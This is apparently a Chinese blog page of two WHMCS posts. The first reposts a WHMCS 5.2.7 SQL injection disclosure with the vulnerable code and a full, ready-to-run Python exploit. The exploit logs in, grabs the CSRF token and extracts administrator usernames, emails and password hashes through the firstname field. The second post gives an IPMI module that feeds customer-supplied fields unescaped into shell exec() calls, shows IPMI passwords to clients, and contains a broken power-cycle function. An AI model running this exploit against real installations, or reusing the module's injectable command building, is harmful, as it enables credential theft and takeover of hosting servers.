搜索到
2
篇与
的结果
-
Whmcs 5.2.7爆SQL注入漏洞 localhost.re大牛在爆solusvm漏洞后沉寂了几个月又爆出了whmcs的SQL注入漏洞。 每篇文章还是依旧带一张搞笑得gif图片 漏洞文件 /includes/dbfunctions.php:<?php function update_query($table, $array, $where) { #[...] if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .= $value.','; continue; } #[...] $result = mysql_query($query, $whmcsmysql); } ?>另外还附带了Python的EXP#!/usr/bin/env python # 2013/10/03 - WHMCS 5.2.7 SQL Injection # http://localhost.re/p/whmcs-527-vulnerabilityurl = 'http://clients.target.com/' # wopsie dopsie user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php user_pwd = 'hacker'import urllib, re, sys from urllib2 import Request, urlopen ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"def exploit(sql): print "Doing stuff: %s" % sql r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read() return re.search(r'(id="firstname" value="(.*?)")', r).group(2)def login(): print "Getting CSRF token" r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua})) csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2) cookie = r.info()['set-cookie'].split(';')[0] print "Logging in" r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read() if 'dologin.php' in r: sys.exit('Unable to login') else: return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]user = login() print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients# oh you want to be evil #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)原文地址:http://localhost.re/p/whmcs-527-vulnerability -
Whmcs IPMI模块 yum install OpenIPMI OpenIPMI-tools登陆whmcs后台》设置》产品/服务》相关产品》自定义字段》分别添加ipmiip/ipmiuser/ipmipass 类型为文本框的字段下列代码保存路径modules/servers/ipmi/ipmi.php<?php //save as [whmcs]/modules/servers/ipmi/ipmi.php function ipmi_ClientArea($params) { // Output can be returned like this, or defined via a clientarea.tpl ipmi file (see docs for more info) $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"];$cmd="ipmitool -H $ipmiip -U $ipmiuser -P $ipmipass -I lanplus power status"; $power=substr(exec($cmd),17); $p="https://$ipmiip/"; $code = "机器电源状态: $power 用户名:$ipmiuser 密码:$ipmipass <a href=\"$p\" target=\"_blank\" style=\"color:#cc0000\">登陆到IPMI页面</a>"; return $code; }function ipmi_AdminLink($params) { $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"]; $i=explode(".",$ipmiip); $p="https://$ipmiip/"; $code = "<a href=\"$p\" target=\"_blank\" style=\"color:#cc0000\">登陆到IPMI页面</a>"; return $code; }function ipmi_reboot($params) { $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"]; $cmd="ipmitool -H $ipmiip -U $ipmiuser -P $ipmipass -I lanplus power reset"; $return=exec($cmd); if ($return=="") $return = "success"; return $return; }function ipmi_off($params) { $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"]; $cmd="ipmitool -H $ipmiip -U $ipmiuser -P $ipmipass -I lanplus power off"; $return=exec($cmd); if ($return=="") $return = "success"; return $return; }function ipmi_on($params) { $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"]; $cmd="ipmitool -H $ipmiip -U $ipmiuser -P $ipmipass -I lanplus power on"; $return=exec($cmd); if ($return=="") $return = "success"; return $return; }function ipmi_cycle($params) { $ipmiip = $params['customfields']["ipmiip"]; $ipmiuser = $params['customfields']["ipmiuser"]; $ipmipass = $params['customfields']["ipmipass"]; $cmd="ipmitool -H $ipmiip -U user -P $pass -I lanplus power cycle"; $return=exec($cmd); if ($return=="") $return = "success"; return $return; }function ipmi_ClientAreaCustomButtonArray() { $buttonarray = array( "重启RESET" => "reboot", "电源重置POWER_CYCLE" => "cycle", "电源关闭POWER_OFF" => "off", "电源开启POWER_ON" => "on", ); return $buttonarray; }function ipmi_AdminCustomButtonArray() { $buttonarray = array( "重启RESET" => "reboot", "电源重置POWER_CYCLE" => "cycle", "电源关闭POWER_OFF" => "off", "电源开启POWER_ON" => "on", ); return $buttonarray; } ?>
